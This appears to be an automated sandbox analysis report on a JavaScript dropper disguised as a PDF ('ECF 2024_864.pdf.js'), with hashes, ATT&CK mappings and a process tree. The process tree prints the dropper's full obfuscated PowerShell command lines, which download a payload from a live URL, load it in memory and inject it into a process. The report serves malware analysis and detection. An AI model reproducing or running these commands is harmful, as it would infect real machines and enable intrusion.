d0a7ab9caee180be753904440f83e6cb505ff4e5bf3790201084dfc365a7ba6d

General

Target

ECF 2024_864.pdf.js
Size

601KB
MD5

1209aa3c1e362933feb8865c34f2a4ee
SHA1

91d4969e93f600480f20399fc2343448dadd8526
SHA256

5887f2482c2d989943b76bb2c63d4809e019e6a993e60b66d776132503658f7d
SHA512

4ee970984f0550f75b6f56102181a439f8428735c3ea3b0716d3fdbb1c60fa4e5a8350aa45f544e1a8cf368597819949df67c56657e5594561b86a941236b695
SSDEEP

12288:HZhY3S3w+Z45JZ+3fUqHwiPAlpIyvvQ54UBPOX8a1Gepxfa+rjuCi5oKjXdbdOv1:fYi3PGLx3USi5UwwB

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2796	powershell.exe
4	2796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2140	powershell.exe
2796	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2140	powershell.exe
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2140	2784	wscript.exe	30
PID 2784 wrote to memory of 2140	2784	wscript.exe	30
PID 2784 wrote to memory of 2140	2784	wscript.exe	30
PID 2140 wrote to memory of 2796	2140	powershell.exe	32
PID 2140 wrote to memory of 2796	2140	powershell.exe	32
PID 2140 wrote to memory of 2796	2140	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\ECF 2024_864.pdf.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAEUATgB2ADoAQwBvAG0AcwBQAEUAQwBbADQALAAyADYALAAyADUAXQAtAGoAbwBpAE4AJwAnACkAIAAoACgAKAAnAEsAZAA4AHUAcgAnACsAJwBsACAAPQAgAGYAZwA4AGgAdAB0ACcAKwAnAHAAcwA6AC8AJwArACcALwBpAGEAOQAwADQANgAwADEALgB1AHMALgBhACcAKwAnAHIAYwBoACcAKwAnAGkAdgBlAC4AbwByAGcALwAnACsAJwA2AC8AaQB0AGUAbQAnACsAJwBzAC8AZABlAHQAYQBoACcAKwAnAC0AbgBvAHQAZQAnACsAJwAtAGoALwAnACsAJwBEAGUAdABhAGgAJwArACcATgBvAHQAJwArACcAZQAnACsAJwBKAC4AdAB4AHQAZgAnACsAJwBnADgAOwBLAGQAOABiAGEAJwArACcAcwBlADYAJwArACcANABDAG8AbgB0AGUAbgB0ACAAPQAgACgATgBlAHcALQBPAGIAagBlACcAKwAnAGMAdAAnACsAJwAgACcAKwAnAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAJwArACcAYgBDACcAKwAnAGwAaQAnACsAJwBlAG4AdAApAC4ARABvAHcAbgBsACcAKwAnAG8AYQBkAFMAdAByAGkAbgBnACgAJwArACcASwAnACsAJwBkADgAdQByAGwAJwArACcAKQA7AEsAJwArACcAZAA4ACcAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAGEAJwArACcAcgB5ACcAKwAnAEMAbwBuAHQAZQBuAHQAIAA9ACcAKwAnACAAJwArACcAWwBTAHkAJwArACcAcwB0AGUAbQAnACsAJwAuAEMAJwArACcAbwAnACsAJwBuAHYAZQByAHQAXQA6ACcAKwAnADoAJwArACcARgByAG8AbQBCACcAKwAnAGEAcwBlADYANABTAHQAcgBpAG4AJwArACcAZwAoAEsAZAA4AGIAYQBzACcAKwAnAGUAJwArACcANgA0AEMAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7AEsAZAA4AGEAcwBzAGUAbQBiAGwAeQAnACsAJwAgAD0AIABbAFIAJwArACcAZQBmAGwAJwArACcAZQAnACsAJwBjAHQAJwArACcAaQBvAG4AJwArACcALgAnACsAJwBBAHMAcwBlAG0AYgBsAHkAXQA6ACcAKwAnADoAJwArACcATABvACcAKwAnAGEAZAAnACsAJwAoAEsAZAA4AGIAaQBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQAKQA7AEsAZAA4ACcAKwAnAHQAeQBwAGUAJwArACcAIAA9ACcAKwAnACAASwBkADgAYQBzAHMAJwArACcAZQBtAGIAJwArACcAbAB5AC4ARwBlACcAKwAnAHQAVAB5AHAAZQAoAGYAZwA4AFIAdQBuAFAAJwArACcARQAnACsAJwAuAEgAbwAnACsAJwBtAGUAJwArACcAZgBnADgAKQA7ACcAKwAnAEsAZAA4AG0AZQB0AGgAJwArACcAbwBkACAAPQAgAEsAZAA4AHQAeQAnACsAJwBwAGUAJwArACcALgBHAGUAdABNAGUAdABoACcAKwAnAG8AJwArACcAZAAoACcAKwAnAGYAJwArACcAZwAnACsAJwA4AFYAQQBJAGYAZwA4ACkAOwBLACcAKwAnAGQAOABtAGUAdABoAG8AZAAuAEkAbgAnACsAJwB2AG8AawAnACsAJwBlACgAJwArACcASwBkADgAbgB1AGwAbAAsACAAJwArACcAWwBvACcAKwAnAGIAagBlACcAKwAnAGMAdABbAF0AXQBAACgAZgBnADgAdAB4ACcAKwAnAHQAJwArACcALgBhACcAKwAnAG0AaQBhAGsALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAAnACsAJwA1AGIAJwArACcANgAzADIAJwArACcAZQBiADkAZQBlACcAKwAnADYAMgAnACsAJwAtAGIAJwArACcAdQBwACcAKwAnAC8ALwA6AHMAcAB0AHQAaABmACcAKwAnAGcAOAAnACsAJwAgACwAIAAnACsAJwBmAGcAOABkACcAKwAnAGUAcwAnACsAJwBhAHQAaQB2AGEAJwArACcAZAAnACsAJwBvAGYAZwA4ACcAKwAnACAALAAgACcAKwAnAGYAZwA4AGQAZQAnACsAJwBzACcAKwAnAGEAdAAnACsAJwBpAHYAYQBkAG8AJwArACcAZgBnADgAIAAsACAAZgBnADgAJwArACcAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwBmAGcAJwArACcAOAAsAGYAZwAnACsAJwA4ACcAKwAnAEEAZABkAEkAJwArACcAbgAnACsAJwBQACcAKwAnAHIAJwArACcAbwBjAGUAcwBzACcAKwAnADMAMgBmAGcAOAAsAGYAZwA4ACcAKwAnAGQAZQBzAGEAdAAnACsAJwBpAHYAYQAnACsAJwBkAG8AZgBnADgAKQApADsAJwApAC0AcgBFAHAATABhAEMAZQAgACAAKABbAEMAaABBAFIAXQAxADAAMgArAFsAQwBoAEEAUgBdADEAMAAzACsAWwBDAGgAQQBSAF0ANQA2ACkALABbAEMAaABBAFIAXQAzADkALQBjAHIAZQBQAGwAQQBDAEUAIAAgACcASwBkADgAJwAsAFsAQwBoAEEAUgBdADMANgApACAAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComsPEC[4,26,25]-joiN'') ((('Kd8ur'+'l = fg8htt'+'ps:/'+'/ia904601.us.a'+'rch'+'ive.org/'+'6/item'+'s/detah'+'-note'+'-j/'+'Detah'+'Not'+'e'+'J.txtf'+'g8;Kd8ba'+'se6'+'4Content = (New-Obje'+'ct'+' '+'System.Net.We'+'bC'+'li'+'ent).Downl'+'oadString('+'K'+'d8url'+');K'+'d8'+'b'+'i'+'n'+'a'+'ry'+'Content ='+' '+'[Sy'+'stem'+'.C'+'o'+'nvert]:'+':'+'FromB'+'ase64Strin'+'g(Kd8bas'+'e'+'64Co'+'nten'+'t)'+';Kd8assembly'+' = [R'+'efl'+'e'+'ct'+'ion'+'.'+'Assembly]:'+':'+'Lo'+'ad'+'(Kd8binaryCon'+'te'+'nt);Kd8'+'type'+' ='+' Kd8ass'+'emb'+'ly.Ge'+'tType(fg8RunP'+'E'+'.Ho'+'me'+'fg8);'+'Kd8meth'+'od = Kd8ty'+'pe'+'.GetMeth'+'o'+'d('+'f'+'g'+'8VAIfg8);K'+'d8method.In'+'vok'+'e('+'Kd8null, '+'[o'+'bje'+'ct[]]@(fg8tx'+'t'+'.a'+'miak/ved.2r.39b345302a075b1bc0d4'+'5b'+'632'+'eb9ee'+'62'+'-b'+'up'+'//:sptthf'+'g8'+' , '+'fg8d'+'es'+'ativa'+'d'+'ofg8'+' , '+'fg8de'+'s'+'at'+'ivado'+'fg8 , fg8'+'d'+'esativadofg'+'8,fg'+'8'+'AddI'+'n'+'P'+'r'+'ocess'+'32fg8,fg8'+'desat'+'iva'+'dofg8));')-rEpLaCe ([ChAR]102+[ChAR]103+[ChAR]56),[ChAR]39-crePlACE 'Kd8',[ChAR]36) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2abc05027d312c29c2edca43d160f517

SHA1
ed4e7366565e61596ae75ce190e852ee11d906e0

SHA256
95b8ceaf43c60af0df06fafe557d9d8f02b02ead2deb5415923bee20aba2fde9

SHA512
71da5d4d2591c0cab06d76d9d9f2d9a64340b16428c8312de898c9c7a455c18140b9741fbefde01905525cc942f9fd4023303ad6504e5a088b937d309267a0fc

Download Submit
memory/2140-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2140-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download
memory/2140-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2140-7-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-13-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-14-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing